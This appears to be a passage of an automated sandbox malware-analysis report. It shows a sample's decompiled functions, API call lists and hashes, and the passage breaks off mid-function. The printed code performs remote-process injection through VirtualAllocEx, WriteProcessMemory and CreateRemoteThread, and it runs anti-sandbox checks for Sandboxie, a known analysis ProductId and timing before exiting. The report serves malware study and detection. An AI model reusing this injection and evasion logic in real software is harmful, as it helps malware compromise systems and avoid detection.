                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction ID: ef45179a0415a0f0738613dd19991e6189ea7b224224af70f6e9243e4b919f09
                                    • Opcode Fuzzy Hash: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction Fuzzy Hash: CAF08270604604AFCB11EBB9CD5698F77ECDB453147A049BBF404F22E1E73C9E009A18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0040387C(void* __eax, long __ecx, void* __edx) {
                                    				void* _t2;
                                    				void* _t5;
                                    				void* _t9;
                                    				long _t10;
                                    				void* _t11;
                                    				SIZE_T* _t12;
                                    
                                    				_push(__ecx);
                                    				_t10 = __ecx;
                                    				_t11 = __edx;
                                    				_t5 = __eax;
                                    				_t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed
                                    				_t9 = _t2;
                                    				WriteProcessMemory(_t5, _t9, _t11, _t10, _t12); // executed
                                    				return _t9;
                                    			}

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction ID: be37be616b4aec00b4a8009f52dfb0ce1374bdb392ffd0e09f2bb002aa04c1fa
                                    • Opcode Fuzzy Hash: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction Fuzzy Hash: 9FD05EA234621437E134216B6C46FB71E4CCBC7BF6E11053AB708E628294A69C0141F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 88%
                                    			E0040B118(void* __edx, void* __edi, void* __esi) {
                                    				void* __ebx;
                                    				char* _t1;
                                    				char* _t2;
                                    				char* _t3;
                                    				char* _t4;
                                    				char* _t5;
                                    				char* _t6;
                                    				char* _t7;
                                    				char* _t8;
                                    				char* _t9;
                                    				char* _t10;
                                    				char* _t11;
                                    				char* _t12;
                                    				char* _t13;
                                    				long _t15;
                                    				void* _t49;
                                    				long _t58;
                                    				void* _t62;
                                    				void* _t63;
                                    				intOrPtr* _t64;
                                    
                                    				_t63 = __esi;
                                    				_t62 = __edi;
                                    				_t1 =  *0x40d1d4; // 0x40e8e0
                                    				if( *_t1 == 1 && E004052EC() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t2 =  *0x40d1b0; // 0x40e8e1
                                    				if( *_t2 == 1 && L00405168(_t58, _t63) == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t3 =  *0x40d1fc; // 0x40e8e2
                                    				if( *_t3 == 1 && E00405124() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t4 =  *0x40d1ac; // 0x40e8e3
                                    				_t71 =  *_t4 - 1;
                                    				if( *_t4 == 1 && E004051CC(_t58, _t62, _t63, _t71) == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t5 =  *0x40d1f4; // 0x40e8e4
                                    				if( *_t5 == 1 && E00405310() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t6 =  *0x40d1c8; // 0x40e8e5
                                    				if( *_t6 == 1 && E004054A4() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t7 =  *0x40d1d0; // 0x40e8e6
                                    				if( *_t7 == 1 && E004053EC() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t8 =  *0x40d1c0; // 0x40e8e7
                                    				if( *_t8 == 1 && E00405334() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t9 =  *0x40d1f8; // 0x40e8e8
                                    				_t81 =  *_t9 - 1;
                                    				if( *_t9 == 1) {
                                    					_t49 = E0040555C(_t58, _t62, _t63, _t81); // executed
                                    					if(_t49 == 1) {
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				_t10 =  *0x40d1bc; // 0x40e8e9
                                    				if( *_t10 == 1 && E0040588C() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t11 =  *0x40d1b4; // 0x40e8ea
                                    				if( *_t11 == 1 && E004056C0() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t12 =  *0x40d200; // 0x40e8eb
                                    				if( *_t12 == 1) {
                                    					_t58 = GetTickCount();
                                    					if(E00405750(L00405168) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004051CC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004052EC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405310) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405334) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004053EC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004054A4) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E0040555C) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004056DC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405770) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004057B4) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E0040588C) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004056C0) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405124) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E004056DC(_t58) == 1) {
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				_t13 =  *0x40d200; // 0x40e8eb
                                    				if( *_t13 != 1) {
                                    					L70:
                                    					return _t13;
                                    				} else {
                                    					E00405770();
                                    					_t15 = GetTickCount();
                                    					_push(0);
                                    					asm("cdq");
                                    					 *_t64 =  *_t64 - _t58;
                                    					asm("sbb [esp+0x4], edx");
                                    					_t13 = _t15;
                                    					if(0 != 0) {
                                    						if(0 <= 0) {
                                    							goto L70;
                                    						}
                                    						L69:
                                    						ExitProcess(0);
                                    						return _t13;
                                    					}
                                    					if(_t13 <= 0x1388) {
                                    						goto L70;
                                    					}
                                    					goto L69;
                                    				}
                                    			}

                                    APIs
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B12E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B148
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B162
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B17C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B196
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1CA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1E4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1FE
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B218
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B232
                                    • GetTickCount.KERNEL32 ref: 0040B245
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B25C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B271
                                      • Part of subcall function 004052EC: GetModuleHandleA.KERNEL32(SbieDll.dll,00000000,0040B128,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 004052F4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B286
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B29B
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2C5
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2DA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2EF
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B304
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B319
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B32E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B343
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B358
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B36D
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B37D
                                    • GetTickCount.KERNEL32 ref: 0040B391
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B3B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$CountTick$HandleModule
                                    • String ID: @$@$@$@$@$@$@$@$@$@$@$@
                                    • API String ID: 835719275-1661000548
                                    • Opcode ID: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction ID: c7fc4875350585e80c75c2e3c7c0fe252a246f454c130cd5c6e6d9ea2ff417f9
                                    • Opcode Fuzzy Hash: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction Fuzzy Hash: 44618230964A006EEA107BA64A06B5F1749CF52349F84007BF9447F2D3DBFDCD415AAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00403A58(void* __eax, void* __ecx, void* __edx, void* __eflags) {
                                    				intOrPtr _v20;
                                    				long _v24;
                                    				_Unknown_base(*)()* _v28;
                                    				_Unknown_base(*)()* _v32;
                                    				char _v36;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				intOrPtr _t15;
                                    				long _t17;
                                    				void* _t19;
                                    				void* _t23;
                                    				void* _t24;
                                    				void* _t31;
                                    				long _t32;
                                    				void* _t33;
                                    				DWORD* _t34;
                                    
                                    				_t25 = __ecx;
                                    				_t34 =  &_v24;
                                    				_t33 = __ecx;
                                    				_t31 = __edx;
                                    				_t23 = __eax;
                                    				_t32 = 0;
                                    				_v28 = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
                                    				_v32 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
                                    				_v36 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
                                    				_t15 = E004037EC(_t23, _t23, _t25, _t33, _t31, 0); // executed
                                    				_v20 = _t15;
                                    				_t17 = E004037EC(_t23, _t23, _t25, _t31, _t31, 0); // executed
                                    				_v24 = _t17;
                                    				_t19 = E004038AC(_t23,  &_v36, E00403A28, 0, 0x14); // executed
                                    				_t24 = _t19;
                                    				if(_t24 != 0) {
                                    					WaitForSingleObject(_t24, 0xffffffff);
                                    					GetExitCodeThread(_t24, _t34);
                                    					_t32 =  *_t34;
                                    				}
                                    				return _t32;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA), ref: 00403A71
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A77
                                    • GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403A8A
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A90
                                    • GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AA3
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403AA9
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AE9
                                    • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AF0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
                                    • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
                                    • API String ID: 3826234517-3123223305
                                    • Opcode ID: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction ID: 752bd04c13f1fb2c2637546d5d52efbb0f8f36bbb6a531361d47cc1ab833d988
                                    • Opcode Fuzzy Hash: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction Fuzzy Hash: 350157A0B443053AC610BE7A4C42A1BBE9C9BC472BB10893F7554B72D2DA7DDF0486AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004012B8(CHAR* __eax, intOrPtr* __edx) {
                                    				char _t5;
                                    				char _t6;
                                    				CHAR* _t7;
                                    				CHAR* _t8;
                                    				char _t9;
                                    				CHAR* _t11;
                                    				char _t14;
                                    				CHAR* _t15;
                                    				char _t17;
                                    				CHAR* _t19;
                                    				CHAR* _t22;
                                    				CHAR* _t23;
                                    				CHAR* _t32;
                                    				intOrPtr _t33;
                                    				intOrPtr* _t34;
                                    				void* _t35;
                                    				void* _t36;
                                    
                                    				_t34 = __edx;
                                    				_t22 = __eax;
                                    				while(1) {
                                    					L2:
                                    					_t5 =  *_t22;
                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                    						_t22 = CharNextA(_t22);
                                    					}
                                    					L4:
                                    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
                                    						_t36 = 0;
                                    						_t32 = _t22;
                                    						while(1) {
                                    							_t6 =  *_t22;
                                    							if(_t6 <= 0x20) {
                                    								break;
                                    							}
                                    							if(_t6 != 0x22) {
                                    								_t7 = CharNextA(_t22);
                                    								_t36 = _t36 + _t7 - _t22;
                                    								_t22 = _t7;
                                    								continue;
                                    							}
                                    							_t8 = CharNextA(_t22); // executed
                                    							_t22 = _t8;
                                    							while(1) {
                                    								_t9 =  *_t22;
                                    								if(_t9 == 0 || _t9 == 0x22) {
                                    									break;
                                    								}
                                    								_t11 = CharNextA(_t22);
                                    								_t36 = _t36 + _t11 - _t22;
                                    								_t22 = _t11;
                                    							}
                                    							if( *_t22 != 0) {
                                    								_t22 = CharNextA(_t22);
                                    							}
                                    						}
                                    						E00402074(_t34, _t36);
                                    						_t23 = _t32;
                                    						_t33 =  *_t34;
                                    						_t35 = 0;
                                    						while(1) {
                                    							_t14 =  *_t23;
                                    							if(_t14 <= 0x20) {
                                    								break;
                                    							}
                                    							if(_t14 != 0x22) {
                                    								_t15 = CharNextA(_t23);
                                    								if(_t15 <= _t23) {
                                    									continue;
                                    								} else {
                                    									goto L27;
                                    								}
                                    								do {
                                    									L27:
                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                    									_t23 =  &(_t23[1]);
                                    									_t35 = _t35 + 1;
                                    								} while (_t15 > _t23);
                                    								continue;
                                    							}
                                    							_t23 = CharNextA(_t23);
                                    							while(1) {
                                    								_t17 =  *_t23;
                                    								if(_t17 == 0 || _t17 == 0x22) {
                                    									break;
                                    								}
                                    								_t19 = CharNextA(_t23);
                                    								if(_t19 <= _t23) {
                                    									continue;
                                    								} else {
                                    									goto L21;
                                    								}
                                    								do {
                                    									L21:
                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                    									_t23 =  &(_t23[1]);
                                    									_t35 = _t35 + 1;
                                    								} while (_t19 > _t23);
                                    							}
                                    							if( *_t23 != 0) {
                                    								_t23 = CharNextA(_t23);
                                    							}
                                    						}
                                    						return _t23;
                                    					} else {
                                    						_t22 =  &(_t22[2]);
                                    						continue;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012EF
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012F9
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401316
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401320
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401349
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401353
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401377
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401381
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CharNext
                                    • String ID: "$"
                                    • API String ID: 3213498283-3758156766
                                    • Opcode ID: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction ID: 10f63cc1fa669f131e3f68441fcaf6b27babd9536db3b85d99238111a4137022
                                    • Opcode Fuzzy Hash: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction Fuzzy Hash: AE21C8446043C059EF316ABA08C07A667C54A1B308B5844BBDAC1FBBF7D47D4887C22E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00403954(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				_Unknown_base(*)()* _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _t20;
                                    				void* _t22;
                                    				void* _t30;
                                    				intOrPtr _t37;
                                    				void* _t40;
                                    				void* _t43;
                                    
                                    				_t30 = __ecx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v8 = __edx;
                                    				_t40 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t43);
                                    				_push(0x4039f2);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t43 + 0xfffffff0;
                                    				_v12 = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
                                    				_v20 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
                                    				_t20 = E004037EC(_t40, 0, _t30, E00401F48(_v8), __edi, _t40); // executed
                                    				_v16 = _t20;
                                    				_t22 = E004038AC(_t40,  &_v20, E00403920, 0, 0xc); // executed
                                    				if(_t22 != 0) {
                                    					CloseHandle(_t22);
                                    				}
                                    				_pop(_t37);
                                    				 *[fs:eax] = _t37;
                                    				_push(E004039F9);
                                    				return E00401AC0( &_v8);
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,004039F2), ref: 00403983
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403989
                                    • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 0040399B
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 004039A1
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 004039D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID: LoadLibraryA$Sleep$kernel32
                                    • API String ID: 3487503967-1813742806
                                    • Opcode ID: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction ID: 3dd456deda738439a9530638aaf5270c0b396e353cabac5e26cfdff56c824f73
                                    • Opcode Fuzzy Hash: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction Fuzzy Hash: 01012DB0B40605BED701EFA68C03A5E7EAC9B44716B60497BB400F72D1DB7C9F009A58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004053EC() {
                                    				char _v264;
                                    				int _v268;
                                    				void* _v272;
                                    				long _t6;
                                    				int _t15;
                                    
                                    				_t15 = 0;
                                    				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
                                    				if(_t6 == 0) {
                                    					_v268 = 0x101;
                                    					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
                                    					if( &_v264 == "76487-644-3177037-23510") {
                                    						_t15 = 1;
                                    					}
                                    				}
                                    				RegCloseKey(_v272);
                                    				return _t15;
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405404
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000), ref: 0040542D
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405443
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004053FA
                                    • ProductId, xrefs: 00405423
                                    • 76487-644-3177037-23510, xrefs: 00405436
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-644-3177037-23510$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-300012159
                                    • Opcode ID: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction ID: 4dbc9aba648d7bbbf83a3552de5bfbcba9719c904d90c9cb7132e047c1fadaca
                                    • Opcode Fuzzy Hash: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction Fuzzy Hash: 30F08C706403007AE610EA90CC82FDB778CDB40715F50483AFA84FA1D1D6BDE9889A6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004054A4() {
